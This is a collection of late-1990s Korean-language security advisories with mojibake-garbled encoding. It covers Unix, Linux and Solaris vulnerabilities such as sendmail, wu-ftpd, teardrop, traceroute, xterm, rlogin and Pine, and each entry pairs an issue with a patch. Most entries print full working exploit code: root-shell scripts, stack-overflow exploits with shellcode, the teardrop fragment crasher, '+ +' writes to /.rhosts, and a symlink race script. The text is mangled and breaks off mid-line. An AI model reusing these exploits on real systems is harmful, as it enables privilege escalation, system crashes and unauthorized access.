ÀÖ´Ù. syslog floodingÀÌ °¡´ÉÇϸç.. ¿À¹öÇ÷ο츦 ÀÏÀ¸Å³¼ö ÀÖ´Â º¸¾È»ó ¹®Á¦Á¡ÀÌ ¹ß°ßµÇ¾ú´Ù. #include main() { sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0); /* 0x80000000 can be replaced with 0xC0000000 -- both are negative, * and * produce a zero when multiplied by sizeof(int) */ } ÀÌ¿Í °°Àº ¹®Á¦Á¡Àº getgroups()¶ó´Â ÇÔ¼ö¿¡¼­µµ ¸¶Âù°¡Áö´Ù. ÇØ°á ¹Ýµå½Ã 2.0.31 ÀÎ »ç¶÷¸¸ °íÃĶó. /usr/src/linux/kernel.sysctl.c ÀÇ ÆÄÀϾȿ¡ struct ctl_table_header *tmp; void *context; if (nlen == 0 || nlen >= CTL_MAXNAME) <= ÀÌ°ÍÀ» if (nlen <= 0 || nlen >= CTL_MAXNAME) <= ÀÌ·¸°Ô °íÃĶó. return -ENOTDIR; error = verify_area(VERIFY_READ,name,nlen*sizeof(int)); ±×¸®°í ´Ù½Ã ÄÄÆÄÀÏ ½ÃÄѶó. Ä¿³Î ÄÄÆÄÀÏ. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À¯´Ð½º sendmail (1) ¸í·É sendmail( 8.7 ~ 8.8.2) ¿µÇâÀÖ´Â ½Ã½ºÅÛ ¼¾µå ¸ÞÀÏÀ» žÀçÇÑ ¸ðµç À¯´Ð½º ¹®Á¦Á¡ ´ÙÀ½°ú °°Àº °£´ÜÇÑ ½ºÅ©¸³Æ®·Î ·çÆ®¸¦ ȹµæÇÒ¼ö ÀÖ´Ù. #/bin/sh # # # Hi ! # This is exploit for sendmail smtpd bug # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). # This shell script does a root shell in /tmp directory. # If you have any problems with it, drop me a letter. # Have fun ! # # # ---------------------- # --------------------------------------------- # ----------------- Dedicated to my beautiful lady ------------------ # --------------------------------------------- # ---------------------- # # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su # # # echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c # # echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c # # cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n "|head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd /tmp/sh ÇØ°áÃ¥ ³ôÀº ¹öÁ¯ÀÇ ¼¾µå¸ÞÀÏÀ» ¼³Ä¡ÇÏ´Â ±æ ¹Û¿¡ ¾ø´Ù. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À¯´Ð½º wu-FTP ¸í·É wu-FTP ( site exec ) ¿µÇâÀÖ´Â ½Ã½ºÅÛ wu-ftp2.x ¸¦ ±òÀº ¸ðµç À¯´Ð½º ¹öÁ¯ ¹®Á¦Á¡ site exec ÀÇ Å« ¹ö±×·Î ·çÆ® ±ÇÇÑÀ¸·Î µ¹¾Æ°¡´Â ftpÀÇ À߸øµÈ ¿À·ù·Î ·çÆ®±ÇÇÑÀ¸·Î È£½ºÆ®ÀÇ ÇÁ·Î±×·¥À» ½ÇÇà½Ãų¼ö°¡ ÀÖ´Ù. cat > bug.c #include #include #include main() { seteuid(0); system("cp /bin/sh /tmp/.sh"); system("chmod 6777 /tmp/.sh"); } À§ÀÇ ¼Ò½º¸¦ cc -o bug bug.c ·Î ÄÄÆÄÀÏ ÈÄ¿¡ ftp ·Î ÀÚ½ÅÀÇ È£½ºÆ®¿¡ Á¢¼Ó ÇÑ´Ù. ±× ¿¹ÀÌ´Ù. ftp 0 220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) r eady. Name (0:guest): guest 331 Password required for guest. Password: (password) 230 User guest logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> quote "site exec bash -c id" (see if sys is exploitable) 200-bash -c id 200-uid=0(root) gid=0(root) euid=505(adm) egid=100(users) groups=100(users) 200 (end of 'bash -c id') ftp> quote "site exec bash -c /home/guest/bug" 200-bash -c /home/guest/bug 200 (end of 'bash -c /home/guest/bug') ftp> quit À§¿Í °°ÀÌ Çϸé bug¶ó´Â ÇÁ·Î±×·¥ÀÌ ·çÆ® ±ÇÇÑÀ¸·Î µ¹¾Æ°¡°Ô µÈ´Ù. ±×·¸°Ô µÇ¸é /tmp µð·ºÅ丮¿¡ ·çÆ®±ÇÇÑÀÇ ½©ÀÌ ¸¸µé¾îÁø´Ù. ÇØ°á ftp ¹öÁ¯À» ÃÖ½ÅÀ¸·Î ¸ÂÃß¾î¶ó. 2.4.2¹öÁ¯ÀÌ¸é ¹«³­ÇÏ´Ù. ¶ÇÇÑ ÀǽÉÇÏ´Â ¾ÆÀ̵ð´Â site ¸í·ÉÀ» »ç¿ëÇÏÁö ¸øÇÏ°Ô Á¦ÇÑÀ» µÎ¾î¶ó --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À¯´Ð½º sendmail (2) ¸í·É sendmail 8.8.4 ½Ã½ºÅÛ ¼¾µå¸ÞÀÏ 8.8.4¸¦ ¿î¿µÇÏ´Â ¸ðµç ½Ã½ºÅÛ ¹®Á¦Á¡ ¼¾µå ¸ÞÀÏÀÇ À߸øµÈ ¹ö±×·Î ÀÎÇØ /var/tmp¿¡ dead.letterÀ̶ó´Â ÆÄÀÏÀ» ¸¸µå´Âµ¥ ÀÌ´Â ·çÆ®ÀÇ ±ÇÇÑÀÌ´Ù. ±× ¿¹ ln -s /.rhosts /var/tmp/dead.letter telnet white.hacker.securi.ty 25 mail from : security@wh.it.e.best rcpt to : Fuck@fuck.you.haha data dlfjs qjrmrk dlTska.. . quit ÀÌ·¸°Ô ÇÔÀ¸·Î½á ·çÆ® µð·ºÅ丮¿¡ .rhosts ÆÄÀÏÀ» ¸¸µé¼ö ÀÖ´Ù. À̸¦ Á»´õ ÀÀ¿ëÇϸé Æнº¿öµå ÆÄÀÏÀ» ¼Õº¼¼ö ÀÖ´Ù. ÇØ°áÃ¥ ¼¾µå¸ÞÀÏ À» 8.8.5 ÀÌ»óÀ¸·Î ¿Ã·Á¶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º Lizards game ¸í·É Lizards game ½Ã½ºÅÛ ½½·¢¿þ¾î 3.4 ¹®Á¦Á¡ Lizards °ÔÀÓÀº setuid°¡ °É·ÁÀÖ´Â ÇÁ·Î±×·¥ÀÌ´Ù. setuid °¡ °É·Á ÀÖ´Â ÀÌÀ¯´Â ¹Ù·Î ÀÌ °ÔÀÓÀÌ svgalib¸¦ »ç¿ëÇϱ⠶§¹®ÀÌ´Ù. ±×·±µ¥ ±× °ÔÀÓÀÇ ¼Ò½º¸¦ º¸¸é system(clear);¶ó°í ÇÔ¼ö¸¦ »ç¿ëÇß´Ù. ÀÌ´Â »ç¿ëÀÚÀÇ ÀÔÀåÀ¸·Î º¸¸é °£´ÜÈ÷ ±¸¸ÛÀ» ¹ß°ßÇÒ ¼ö ÀÖ´Ù. path=. ¶ó°í µÎ°í clear ½ºÅ©¸³Æ®¸¦ ÀÛ¼ºÇÏ¿© ±× clear½ºÅ©¸³Æ®¸¦ ·çÆ®ÀÇ ±ÇÇÑÀ¸·Î µ¹¸±¼ö ÀÖ´Ù. ÇØ°áÃ¥ ¿ì¼± ±× ÆÄÀÏÀÇ Æ۹̼ÇÀ» ´Ý¾ÆµÎ¾î¶ó. chmod -s /usr/games/lizardlib/lizardshi --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º IP fragment overlap ¸í·É IP fragment overlap ½Ã½ºÅÛ ¸®´ª½º / À©µµ¿ì NT / À©µµ¿ì 95 / ±âŸ À¯´Ð½º ½Ã½ºÅÛ ¹®Á¦Á¡ ¾Æ·¡ÀÇ ÇÁ·Î±×·¥À» µ¹·Á¼­ ½Ã½ºÅÛÀ» ¸ØÃß°Ô ÇÒ ¼ö ÀÖ´Ù. /* * Copyright (c) 1997 route|daemon9 * 11.3.97 * * Linux/NT/95 Overlap frag bug exploit * * Exploits the overlapping IP fragment bug present in all Linux * kernels and NT 4.0 / Windows 95 (others?) * * Based off of: flip.c by klepto * Compiles on: Linux, *BSD* * * gcc -O2 teardrop.c -o teardrop * OR * gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING */ #include #include #include #include #include #include #include #include #include #include #include #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define PADDING 0x1c /* datagram frame padding for first packet */ #define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 * / #define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can * withstand maybe 5 or 10 sometimes... Experiment. */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; fprintf(stderr, "teardrop route|daemon9\n\n"); if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(on e)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2] ))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Death on flaxen wings:\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } /* * Send two IP fragments with pathological offsets. We use an implementati on * independent way of assembling network packets that does not rely on any of * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD). */ void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; /* * Grab some memory for our packet, align p_ptr to point at the beginnin g * of our packet, and then fill it with zeros. */ packet = (u_char *)malloc(IPH + UDPH + PADDING); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel * / *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&si n, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } /* We set the fragment offset to be inside of the previous packet's * payload (it overlaps inside the previous packet) but do not include * enough payload to cover complete the datagram. Just the header will * do, but to crash NT/95 machines, a bit larger of packet seems to wor k * better. */ p_ptr = &packet[2]; /* IP total length is 2 bytes into the heade r */ *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1); p_ptr += 4; /* IP offset is 6 bytes into the header */ *((u_short *)p_ptr) = FIX(MAGIC); if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\ n", name); exit(0); } ÇØ°áÃ¥ Ä¿³ÎÀ» 2.0.32-pre4 ·Î ¾÷Çضó. or ¼Ò½º¸¦ ´ÙÀ½°ú °°ÀÌ ¹Ù²ã¼­ ´Ù½Ã ÄÄÆÄÀÏ ½ÃÄѶó --- ip_fragment.c Mon Nov 10 14:58:38 1997 +++ ip_fragment.c.patched Mon Nov 10 19:18:52 1997 @@ -12,6 +12,7 @@ * Alan Cox : Split from ip.c , see ip_input.c for history. * Alan Cox : Handling oversized frames * Uriel Maimon : Accounting errors in two fringe case s. + * route : IP fragment overlap bug */ #include @@ -578,6 +579,22 @@ frag_kfree_s(tmp, sizeof(struct ipfrag)); } } + + /* + * Uh-oh. Some one's playing some park shenanigans on us. + * IP fragoverlap-linux-go-b00m bug. + * route 11.3.97 + */ + + if (offset > end) + { + skb->sk = NULL; + printk("IP: Invalid IP fragment (offset > end) found from % s\n", in_ntoa(iph->saddr)); + kfree_skb(skb, FREE_READ); + ip_statistics.IpReasmFails++; + ip_free(qp); + return NULL; + } /* * Insert this fragment in the chain of fragments. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º pppd chatscript ¸í·É µ¥ºñ¾È pppd chatscript ½Ã½ºÅÛ µ¥ºñ¾È ¸®´ª½º ¹®Á¦Á¡ /var/log/ppp.log ÆÄÀÏÀ» ´©±¸³ª ´Ù ÀÐÀ»¼ö ÀÖ°Ô Çسõ¾Ò´Ù. $> more /var/log/ppp.log ¾î¼±¸ Àú¼±¸. Dec 14 16:43:14 gateway chat[362]: ^Mlogin -- got it Dec 14 16:43:14 gateway chat[362]: send (loginname^M) Dec 14 16:43:15 gateway chat[362]: expect (word) Dec 14 16:43:15 gateway chat[362]: : loginname^M Dec 14 16:43:15 gateway chat[362]: Password -- got it Dec 14 16:43:15 gateway chat[362]: send (³ªÀÇÆнº¿öµå^M) ÀÌ·± Çü½ÄÀ¸·Î ³»¿ëÀ» º¸¸é Æнº¿öµå°¡(^^;) º¸ÀδÙ. ÇØ°áÃ¥ ÆÐÄ¡µÈ ¹öÁ¯ÀÌ ¾ø´Â°Í °°´Ù. ^^; Áö±ÝÀº ³ª¿ÔÀ» °ÍÀÌ´Ù. ¹öÁ¯À» ¿Ã·Á¶ó --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º X ¼­¹ö ¸í·É X¼­¹ö- XFree 3.3.1 3.2.9 3.1.2 ÀÇ XF86_½Ã¸®Áî ½Ã½ºÅÛ ¿¢½º¼­¹ö¸¦ ¾´´À ¸ðµç À¯´Ð½º¹× ¸®´ª½º ¹®Á¦Á¡ ´ÙÀ½°ú °°Àº Æí¹ýÀ¸·Î ùÁÙÀÇ ÆÄÀÏÀ» º¼¼ö°¡ ÀÖ´Ù. $ ls -al /etc/shadow -rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow $ id uid=502(loveyou) gid=500(users) groups=500(users) $ cd /usr/X11R6/bin $ ./XF86_SVGA -config /etc/shadow Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1 use: X [:] [option] -a # mouse acceleration (pixels) -ac disable access control restrictions -audit int set audit trail level -auth file select authorization file bc enable bug compatibility -bs disable any backing store support -c turns off key-click ÀÌ·± Çü½ÄÀÌ´Ù.. ÇØ°áÃ¥ Setuid ¸¦ ¾ø¾Ö´øÁö ƯÁ¤ ÀÌ¿ëÀÚ¸¸ ¾²µµ·Ï Çã¶ôÇضó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º ·¡µåÇÞ 5.0 À¯Æ¿¸®Æ¼ ¸í·É /bin/ping, /usr/sbin/traceroute, /usr/bin/rlogin, /usr/bin/rsh (actually glibc2 is guilty one) ½Ã½ºÅÛ ·¡µåÇÞ 5.0 ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö·±À» ÀÌ¿ëÇؼ­ ·çÆ®¸¦ ¾ò´Â´Ù. /* Just Your Standard EGGSHELL Proggie: traceroute buffer overflow exploit for RedHat Linux 5.0 mostly ripped from Aleph One Wilton Wong wwong@blackstar.net gcc -o trace_shell trace_shell.c */ #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 1019 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); printf("Now run: /usr/sbin/traceroute $RET\n"); system("/bin/bash"); } ÇØ°áÃ¥ ÆÐÄ¡ ¹æ¹ý $ diff -u /dbase/glibc-2.0.6pre4/resolv/res_query.c /usr/glibc/src/libc/resolv/ --- /dbase/glibc-2.0.6pre4/resolv/res_query.c Mon Jan 6 23:05:43 1997 +++ /usr/glibc/src/libc/resolv/res_query.c Mon Dec 8 09:05:53 1997 @@ -321,7 +321,7 @@ u_char *answer; /* buffer to put answer */ int anslen; /* size of answer */ { - char nbuf[MAXDNAME]; + char nbuf[MAXDNAME * 2 + 2]; /*À̺κÐÀ» À§¿Í ¹Ù²Ù¸é µÈ´Ù.*/ const char *longname = nbuf; int n; --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º crontab ¸í·É dillon crontab / crond ( dcron 2.2 ) ½Ã½ºÅÛ ½½·º¿þ¾î 3.4 ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö Ç÷ο츦 ÀÌ¿ëÇؼ­ ·çÆ®¸¦ ¾òÀ»¼ö ÀÖ´Ù. ÀáÀçÀûÀÎ ¹öÆÛ ¿À¹ö Ç÷οìÀÇ °¡´É¼ºÀÌ º¸ÀδÙ. ÇØ°áÃ¥ ´ÙÀ½ÀÇ »çÀÌÆ®¿¡¼­ ÆÐÄ¡ ¹öÁ¯À» ¹Þ´Â´Ù. ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.tar.gz ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.diff.gz --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º xterm ¸í·É xterm ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5.1(SunOS 5.5.1) ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö Ç÷ο츦 ÀÏÀ¸ÄÑ º¸¾È»ó ÇêÁ¡À» ¸¸µé¼ö ÀÖ´Ù. ±× ¿¹Á¦ÀÌ´Ù. /* * X11R6.3 xterm exploit for solaris 2.5.1 by DCRH 28/5/97 * */ #include #include #include #include #define EXTRA2 1300 #define BUF_LENGTH 400 #define EXTRA 500 /* Need an addr such that contents of addr+0xe98 = 0 */ #define SAFE_ADDR ((unsigned)0xefff2008) #define STACK_OFFSET 0x4800 #define SPARC_NOP 0xa61cc013 u_long sparc_shellcode[] = { "½©ÄÚµå" }; u_long get_sp(void) { asm("mov %sp,%i0 \n"); } char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8]; char longvar[0x4000] = "BLAH="; void main(int argc, char *argv[]) { char *env[2]; unsigned long targ_addr; u_long *long_p; int i, code_length = sizeof(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf; for (i = 0; i < EXTRA2 / sizeof(u_long); i++) *long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24); targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; for (i = 0; i < code_length / sizeof(u_long); i++) *long_p++ = sparc_shellcode[i]; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); /* This is just to shove the stack down a bit */ memset(&longvar[5], 'a', sizeof longvar-6); longvar[sizeof longvar -1] = '\0'; env[0] = longvar; env[1] = NULL; execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env); perror("execl failed"); } ÇØ°áÃ¥ ´ÙÀ½ÀÇ »çÀÌÆ®¿¡¼­ ¿ÍÆÛ¸¦ ±¸Çشٰ¡ ¼³Ä¡Ç϶ó. ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper /overflow_wrapper.c or http://cegt201.bradley.edu/~im14u2c/wrapper/ --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º ff.core ¸í·É /usr/openwin/bin/ff.core ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.4 ¹®Á¦Á¡ IFS=/À» ÀÌ¿ëÇؼ­ /usr/??ÇÁ·Î±×·¥À» µ¹¸®·Á´Â ff.core ÆÄÀÏÀÇ º»·¡ ÃëÁö¸¦ ¹þ¾î³ª usr ÇÁ·Î±×·¥À» µ¹¸®°í ±× µÚÀÇ °ÍµéÀº Àμö·Î½á ÀÛ¿ëÇÏ°Ô ¸¸µç´Ù. ´ÙÀ½Àº ±× ¿¹Á¦ÀÌ´Ù. % ksh % cd /tmp % cp /bin/ksh . % echo "chown root ksh; chmod u+s ksh" > usr % chmod +x usr % export IFS=/ % ÇÑÁÙÀÇ ¾î¶² ¸í·É .. % ./ksh # ÇØ°áÃ¥ ÆÐÄ¡Çضó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º gethostbyname() ¸í·É gethostbyname() ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5 2.5.1 ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö Ç÷ο츦 ÀÏÀ¸ÄѼ­ ½©À» ½ÇÇà½ÃŲ´Ù..·çÆ® ¼ÒÀ¯·Î. ±× ¿¹Á¦ÀÌ´Ù. /* * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines * by exploiting the gethostbyname() overflow in rlogin. * * gcc -o rlogin-exploit rlogin-exploit.c * * Jeremy Elson, 18 Nov 1996 * jeremy.elson@nih.gov */ #include #include #include #include #define BUF_LENGTH 8200 #define EXTRA 100 #define STACK_OFFSET 4000 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] ="½©ÄÚµå"; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode); long_p = (u_long *) buf; for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i out & (and go to sleep). # # version 3.91, 3.92 ..... # version 3.95 fixed # # Note: must do some changes in the script. look 4 CHANGE THIS: # # Yea i know is a lame script but is better than nothing.. # try to exploit the bug without a script and you will wait # forever. # e-torres@uniandes.edu.co # argumentos=0 if [ $# -eq $argumentos ] then echo "Usage: $0 username path/file_to_create & " echo "ET Lownoise 1996 Colombia" exit fi username=$1 archivo=$2 #CHANGE THIS: #text='text to puit in file to create' #usr=path of the program users #pineprog=how the pine program appears when u do a w (who) command text='+ +' usr=users pineprog=pine # date echo "- Looking for $1 to log in... just wait" # entrada=0 entro=0 until [ $entro -eq $entrada ] do for nombre in `$usr` do if [ $nombre = $1 ] then entro=1 fi done done date echo "- Ok $username is logged now." # echo "- Lets wait that $1 run pine. " noejecuto=0 ejecuto=0 until [ $ejecuto -ne $noejecuto ] do for ejecutando in `w $username` do if [ $ejecutando = $pineprog ] then date echo '- OK ' $1 ' is running ' $pineprog '.' ejecuto=1 fi done done echo "- Now lets grab the lock file of $username from /tmp" ls -al /tmp | grep $username > temp1 cat temp1 | grep rw-rw-rw- > temporal lockfile=`awk '{print $9}' temporal` rm temp1 rm temporal echo "> Username $username" echo "> Lockfile $lockfile" echo echo "- OK now im going to wait that $username " echo " quits $pineprog " # do it till exist lockfile, that means username havent quit pine cd /tmp while [ -s $lockfile ] do sleep 0 done cd date echo "- OK $username quit $pineprog .. now to link $lockfile " #$archivo is the complete path of file in username cd /tmp (ÇÑÁÙÀÇ °úÁ¤) cho "- $lockfile is now linked " cd echo "- $username must now return to pine to create" echo " $archivo " echo "- Waiting $username to return pine " noejecuto=0 ejecuto=0 until [ $ejecuto -ne $noejecuto ] do for ejecutando in `w $username ` do if [ $ejecutando = $pineprog ] then date echo '- OK ' $username ' is running ' $pineprog ejecuto=1 fi done done echo "- Introducing text..." cd /tmp echo $text > $lockfile echo "- Erasing $lockfile " rm $lockfile cd echo "THE END DUDE!" echo "ET Lownoise 1996 " ÇØ°áÃ¥ PineÀÇ ¹öÁ¯À» 3.95ÀÌ»óÀ¸·Î ¹Ù²Ù¾î¶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º sendmail ¸í·É sendmail ( 8.7.x ~ 8.8.2?) ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5 2.5.1 ¹®Á¦Á¡ ¼¾µå ¸ÞÀÏ»óÀÇ ¹ö±×·Î ·çÆ®½©À» »ý¼ºÇÒ ¼ö ÀÖ´Ù. ´ÙÀ½Àº ±× ¿¹Á¦ÀÌ´Ù. #/bin/sh # # Modify RUN in x.c for what you wanna run, and possibly the # location or format of the ps command in the KILL line below for # your platform. # # Or you could remove x.c alltogether and just put what you wanna # do as root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely) # # cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { (ÀÏ·ÃÀÇ °úÁ¤ ..) } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi ÇØ°áÃ¥ ¼¾µå¸ÞÀÏÀÇ ¹öÁ¯À» 8.8.5 ÀÌ»óÀ¸·Î ¿Ã¸®¸é µÈ´Ù. --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º admintool ¸í·É admintool ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5 ¹®Á¦Á¡ ´ÙÀ½°ú °°Àº°£´ÜÇÑ °æÀ§·Î .rhostsÆÄÀÏÀ» »ý¼ºÇÏ¿© ·çÆ®¸¦ ȹµæÇÒ¼ö ÀÖ´Ù. setenv DISPLAY 